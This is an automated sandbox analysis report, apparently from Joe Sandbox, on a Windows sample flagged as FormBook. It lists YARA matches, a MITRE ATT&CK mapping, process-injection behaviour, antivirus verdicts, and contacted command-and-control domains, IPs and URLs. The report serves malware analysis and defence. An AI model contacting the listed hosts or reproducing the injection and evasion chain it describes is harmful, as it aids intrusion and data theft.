          Source: Yara matchFile source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458762 Sample: JFBlvEr5H9 Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 35 www.advancedaccessapplications.com 2->35 37 advancedaccessapplications.com 2->37 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 7 other signatures 2->53 10 JFBlvEr5H9.exe 3 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\...\JFBlvEr5H9.exe.log, ASCII 10->27 dropped 55 Tries to detect virtualization through RDTSC time measurements 10->55 14 JFBlvEr5H9.exe 10->14         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 14->57 59 Maps a DLL or memory area into another process 14->59 61 Sample uses process hollowing technique 14->61 63 Queues an APC in another process (thread injection) 14->63 17 mstsc.exe 12 14->17         started        21 explorer.exe 14->21 injected process9 dnsIp10 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Tries to detect virtualization through RDTSC time measurements 17->43 23 cmd.exe 1 17->23         started        29 www.pyithuhluttaw.net 103.91.67.83, 80 GIGABIT-MYGigabitHostingSdnBhdMY Malaysia 21->29 31 www.aideliveryrobot.com 52.20.84.62, 49751, 80 AMAZON-AESUS United States 21->31 33 2 other IPs or domains 21->33 45 System process connects to network (likely due to code injection or exploit) 21->45 signatures11 process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          JFBlvEr5H9.exe20%VirustotalBrowse
          JFBlvEr5H9.exe22%ReversingLabsByteCode-MSIL.Spyware.Noon
          JFBlvEr5H9.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.JFBlvEr5H9.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          advancedaccessapplications.com0%VirustotalBrowse
          www.pyithuhluttaw.net1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.sajatypeworks.com20%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cnX0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.anewdistraction.com/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/40%URL Reputationsafe
          http://www.fontbureau.com20%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/)0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sajatypeworks.come0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.aideliveryrobot.com/p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs80%Avira URL Cloudsafe
          http://www.fontbureau.comue0%URL Reputationsafe
          http://www.fontbureau.comW.TTF0%Avira URL Cloudsafe
          http://www.fontbureau.comsivd0%Avira URL Cloudsafe
          http://www.fontbureau.comda0%Avira URL Cloudsafe
          http://www.fontbureau.comion0%URL Reputationsafe
          http://en.wikipedia0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/B0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://en.w0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/w0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cnl-nX0%Avira URL Cloudsafe
          http://www.pyithuhluttaw.net/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=NEaCbUvtdfVyj3ONmrIJ7dR/yfSp7Xbba33MRCbi010%Avira URL Cloudsafe
          http://www.fontbureau.comn0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn30%Avira URL Cloudsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/s/00%Avira URL Cloudsafe
          http://www.founder.com.cn/cnicr0%Avira URL Cloudsafe
          http://www.fontbureau.comals0%URL Reputationsafe
          http://www.fontbureau.comalic0%URL Reputationsafe
          http://www.founder.com.cn/cns-m0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          advancedaccessapplications.com
          34.98.99.30
          truetrueunknown
          www.pyithuhluttaw.net
          103.91.67.83
          truetrueunknown
          www.aideliveryrobot.com
          52.20.84.62
          truetrue
            unknown
            ext-sq.squarespace.com
            198.185.159.144
            truefalse
              high
              www.anewdistraction.com
              unknown
              unknowntrue
                unknown
                www.advancedaccessapplications.com
                unknown
                unknowntrue
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.adultpeace.com/p2io/true
                  • URL Reputation: safe
                  low
                  http://www.anewdistraction.com/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFftrue
                  • Avira URL Cloud: malware
                  unknown
                  http://www.aideliveryrobot.com/p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8true
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.fontbureau.com/designersGJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                    high
                    http://www.sajatypeworks.com2JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers/?JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                      high
                      http://www.founder.com.cn/cn/bTheJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers?JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cnXJFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.tiro.comexplorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                          high
                          http://www.goodfont.co.krJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sajatypeworks.comJFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.typography.netDJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.founder.com.cn/cn/cTheJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.galapagosdesign.com/staff/dennis.htmJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://fontfabrik.comJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.jiyu-kobo.co.jp/4JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com2JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.galapagosdesign.com/DPleaseJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.jiyu-kobo.co.jp/)JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fonts.comJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                            high
                            http://www.sandoll.co.krJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.urwpp.deDPleaseJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.zhongyicts.com.cnJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sajatypeworks.comeJFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sakkal.comJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0JFBlvEr5H9.exe, 00000000.00000003.240494408.0000000005917000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.comJFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.comueJFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.comW.TTFJFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.comsivdJFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.comdaJFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.comionJFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://en.wikipediaJFBlvEr5H9.exe, 00000000.00000003.237660704.0000000005933000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/jp/JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.comaJFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/BJFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.comdJFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://en.wJFBlvEr5H9.exe, 00000000.00000003.238128917.0000000005916000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comlJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/wJFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cnJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.239881394.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlJFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cnl-nXJFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.pyithuhluttaw.net/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=NEaCbUvtdfVyj3ONmrIJ7dR/yfSp7Xbba33MRCbi01mstsc.exe, 00000015.00000002.500275639.0000000000957000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlJFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.comnJFBlvEr5H9.exe, 00000000.00000003.246881915.000000000591C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.founder.com.cn/cn3JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.commJFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/s/0JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designers8JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cnicrJFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.comalsJFBlvEr5H9.exe, 00000000.00000003.245948379.000000000591E000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.comalicJFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cns-mJFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        52.20.84.62
                                        www.aideliveryrobot.comUnited States
                                        14618AMAZON-AESUStrue
                                        198.185.159.144
                                        ext-sq.squarespace.comUnited States
                                        53831SQUARESPACEUSfalse
                                        103.91.67.83
                                        www.pyithuhluttaw.netMalaysia
                                        55720GIGABIT-MYGigabitHostingSdnBhdMYtrue

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:458762
                                        Start date:03.08.2021
                                        Start time:18:11:50
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 12m 39s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:JFBlvEr5H9 (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:29
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@8/1@6/3
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 29.7% (good quality ratio 26.6%)
                                        • Quality average: 72.9%
                                        • Quality standard deviation: 31.8%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                        • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 23.211.6.115, 23.211.4.86, 20.82.210.154, 51.103.5.159, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235
                                        • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        18:12:54API Interceptor1x Sleep call for process: JFBlvEr5H9.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        52.20.84.62ORDER_0009_PDF.exeGet hashmaliciousBrowse
                                        • www.microprojects.net/usvr/?UTeX=0nvlV2GPCB&r6=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91jHst47aV7F3
                                        PO_0008.exeGet hashmaliciousBrowse
                                        • www.microprojects.net/usvr/?T4Vtm=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91gn8iZriLesw&mD=3f2XLdWh
                                        AKG Upgrade Project HP Flare Tip 2018-08311SP-01 R1.exeGet hashmaliciousBrowse
                                        • www.deluxeluxe.com/um8e/?D0Dhj=tQxxJThvRlF7uoOgmKtpnJxKPLvD7BbNwQKdj7BVp8iUEZTiqea3Amb+hFcdLgzdK8CzQxtKUQ==&SpK=0RphU8o
                                        Order210622.exeGet hashmaliciousBrowse
                                        • www.brilliantpeople.net/rnn4/?0THhF=qhW2N+OENxuMgY6BQaqBOu4zVUVJPBlL429j4mgTcKLmbUhdjsUCZCU6ULuIPrPPYOxR&8pwDR8=e8n098fX
                                        PO#8076.exeGet hashmaliciousBrowse
                                        • www.trexzin.com/bdIo/?X48Tg=jAEoepUnyJD91hGIbt2H4UvT4GD8W6JahuuTP0mS336S1qZTdyjn+n+zKoIxJBcmVMCk&crht=2dW4nLD0NtvHXLw
                                        WP7IsjaUga.exeGet hashmaliciousBrowse
                                        • www.shopcovetandcrave.com/xkcp/?8pN=meM2OjwkY62wSDZXdg/l66lNbQP+VMltxyXirsNu53DvjKPfmqUuxV1+NEGS4eI+DGZeUAgzkg==&j48=cXRx_BcH
                                        Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                        • www.shopilyzer.com/hdno/?k6AL=bX2LslV8_8H&5jUh5Lj=vAHjBshrQY90wbP6wYuAGGrsBv3yB0uVhINcxtb/jdclzZG+1EkiLuqYoGnk5rONj/yr
                                        quote.pdf.exeGet hashmaliciousBrowse
                                        • www.pheki.com/owws/?RR=hW6PN3g+bwFsTqYxfcMdFyeWy4Tbl5JsVDeq1KYqt17Exinv6hntH0if2hhU24Mi3HAxD4apXQ==&rVEx8D=S0GhCH
                                        bin.exeGet hashmaliciousBrowse
                                        • www.aideliveryrobot.com/p2io/?uN9hQ=ejlP_vuP4dl4N6&qFQl7Pf8=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ
                                        Ac5RA9R99F.exeGet hashmaliciousBrowse
                                        • www.fydia.com/evpn/?CZa4=U0Pdmtql4+VvPQSQ+Swt/ksTplWHB0r6aeBNER6H7DGyqmGYWZ07p8SdnjAA6A5mLpns&CPWhW=C8eHk
                                        Calt7BoW2a.exeGet hashmaliciousBrowse
                                        • www.fydia.com/evpn/?Dxoxa=ZRmh28X82b&kzrxPDG=U0Pdmtql4+VvPQSQ+Swt/ksTplWHB0r6aeBNER6H7DGyqmGYWZ07p8Sdngg6qRZeROGr
                                        invoice.exeGet hashmaliciousBrowse
                                        • www.widedepot.com/ch65/?uDKD=JuzkL7T4LUnZTQsUlWd3pHkHj4YuC1s7udC2v9/pP6vadqV25YE+uBd9xvjli+Qg28+H&1bd0lZ=gvRpZrK08tSP66
                                        pVXFB33FzO.exeGet hashmaliciousBrowse
                                        • www.thrivezi.com/bw82/?BRAh4F=3XAKDXBTzYl+7eF3IcS+nDMUHIb0m9P0UUgWBFY1xibMAyIvduB5azogqQPpRVdFOyxC&VR-T8=l6AlF0u814LH_Lj

                                        Domains

